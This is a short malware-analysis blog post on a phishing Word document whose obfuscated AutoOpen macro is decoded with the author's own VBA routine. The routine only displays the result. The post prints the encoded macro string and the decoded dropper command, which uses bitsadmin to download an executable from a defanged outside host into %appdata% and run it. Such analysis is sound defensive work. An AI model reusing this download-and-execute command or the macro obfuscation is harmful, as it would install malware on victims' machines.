De-obfuscating Macro from Phish Email

Saw this word doc in an email

Virus Total link

MD5 8cd6cee9d328a0c0fa8d5ddb150cd5e9

Email Subject: XXXX Credit Card Authorization Form

It contained macros that were obfuscated, partial example is below

Sub AutoOpen()
eculso = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
eculso = ekkule(eculso, ".")
resultString2 = ynoqa(eculso)

....


The string eculso clearly contained the malicious command to be run, so I removed the "run" commands in vb and created a de-obfuscate function reversing their vba code.

Public Function deobfuscate(obfuscated_command)
  pass1 = Join(Split(obfuscated_command, "."), "%%")
  still_obfuscated_command = Split(Trim(pass1), "%")
  resultstr = ""
  For counter = 0 To UBound(still_obfuscated_command)
   If Len(still_obfuscated_command(counter)) > 0 Then
    rotate_pass2 = CInt((still_obfuscated_command(counter))) + 10
    rotate_pass3 = Chr((rotate_pass2 + 2) + 2)
    converted_string = Array(resultstr, rotate_pass3)
    resultstr = Join(converted_string, "")
   End If
  Next
  deobfuscate = resultstr
End Function

Private Sub Document_Open()
  obfuscated_command = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
  actual_command = deobfuscate(obfuscated_command)
  InputBox "malcode", "infosec", actual_command
End Sub


Which results in the malicious command printed to the a popup for me to view

cmd.exe /c "waitfor /t 6 oniju & bitsadmin /transfer utiwpy /download /priority normal hxxp://ppeppeppety[.]com/ttt/2noren.exe %appdata%\ynenm.exe &start %appdata%\ynenm.exe"







More about neonprimetime

• neonprimetime pastebin
• neonprimetime virustotal
• @neonprimetime twitter
• neonprimetime reddit

Top Blogs of all-time

1. pagerank botnet sql injection walk-thru
2. DOM XSS 101 Walk-Through
3. An Invoice email and a Hot mess of Java

Top Github Contributions

1. Qualys Scantronitor 2.0

Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.